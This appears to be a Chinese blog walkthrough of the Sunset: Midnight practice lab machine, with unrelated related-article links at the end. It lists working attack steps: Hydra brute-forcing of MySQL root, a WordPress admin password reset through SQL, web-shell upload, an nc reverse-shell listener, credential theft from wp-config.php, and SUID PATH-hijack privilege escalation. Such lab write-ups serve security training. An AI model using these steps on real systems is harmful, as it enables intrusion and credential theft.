1.浏览器输入地址打开网页;
根据页面提示发现此网站的CMS是wordpress;

2.端口扫描
扫描完成后发现就开了三个端口,没什么更多的信息了;

3.Wpscan枚举;
根据前面的信息知道网站的CMS是Wordpress,用Wpscan工具扫描之后依然没有得到更多有价值的信息;

4.Hydra暴力破解数据库

hydra -l root -P /usr/share/wordlists/rockyou.txt 10.36.101.114 mysql

通过暴力破解拿到了mysql的数据库的用户名和密码

5.登录数据库;
成功登录数据库之后看到了admin用户的密码,但是无法进行解密,用语句进行修改;

update wp_users set user_pass=md5('admin') where user_login='admin';




6.登录Wordpress后台上传shell
附一个Wordpress上传shell链接https://secnhack.in/upload-shell-on-wordpress-site/


在kali里面使用nc -lvp 1234监听端口,可以成功反弹shell;
在/var/www/html/wordpress/wp-config.php这个文件里面找到了登录所用的用户和密码;

7.SSH登录靶机;

8.查找拥有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null


利用这里靠好大哥教授一招利用成功,直接获取root权限;

export PATH=/tmp/:$PATH
cd /tmp
echo "/bin/sh">service
/usr/bin/status

SUNSET: MIDNIGHT靶机相关推荐

  1. 靶机渗透练习90-Grotesque:1.0.1

    靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...

  2. 看完这篇 教你玩转渗透测试靶机vulnhub——Noontide

    Vulnhub靶机Noontide渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞利用: ③:SSH登 ...

  3. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  4. HA: InfinityStones靶机渗透测试

    文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...

  5. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  6. HA: Dhanush靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...

  7. Lampiao靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...

  8. 【3月30日直播】新冠病毒全基因组测序——Midnight试剂盒及整体解决方案

    识别上方二维码 或点击「阅读原文」 免费报名参加 新冠疫情肆虐全球,基于Nanopore测序技术和数据分析在全球感染性疾病防控中的优势充分显现出来.该平台使用灵活.操作简便.产出快速.分析实时等特征为 ...

  9. 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器

    这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...

最新文章

  1. Java异常信息处理类
  2. Linux加密和安全
  3. RabbitMQ学习笔记四:RabbitMQ命令(附疑难问题解决)
  4. ROW_NUMBER() 分页
  5. 《互联网项目运营分析》第四章 :互联网项目的技术选择与应用
  6. 2020-12-6(从反汇编理解指针和引用的区别)
  7. GDCM:gdcm::IODs的测试程序
  8. mapreduce的shuffle机制(来自学习笔记)
  9. linux系统安装nc,Lifelong learner.
  10. php暂停循环,在特定数量的递归循环后,PHP停止执行
  11. MyBatis中SQL语句相关内容
  12. 服务器响应401,服务器返回HTTP响应代码:401,URL:https
  13. 【转】【Java/Android】Toast使用方法大全
  14. 关于Maven本地仓库中存在依赖时,重新下载was cached in the local repository错误
  15. 说说Asp.net 身份验证、授权
  16. springmvc.xml或spring.xml 能运行配置文件总是出现错误
  17. 如何JOPtionPane的showConfirmDialog对话框button设置监视器
  18. 安卓逆向 -- JEB3.7安装使用
  19. c语言变量格式化,C语言新手入门之格式化输出和变量类型
  20. 在method方法被调用之后,仅打印出a=100,b=200,请写出method方法的代码

热门文章

  1. 基于easyx的c++贪吃蛇
  2. Adavanced Installer 用户自定义行为——卸载时删除残留日志文件
  3. Eden's sharing : Supercharger
  4. 视通助力中国航天某院多媒体会议室建设
  5. 压力测试工具WCAT
  6. ABP +VUE Elment 通用高级查询(右键菜单)设计+LINQ通用类Expression<Func<TFields, bool>>方法
  7. Tikz作图教程:如何画流程图?——从一个简单的例子谈起
  8. B - Magical Subsequence
  9. Dangling meta character '+' near index 0 + 报错 解决方法
  10. qq音乐获取歌曲源链接地址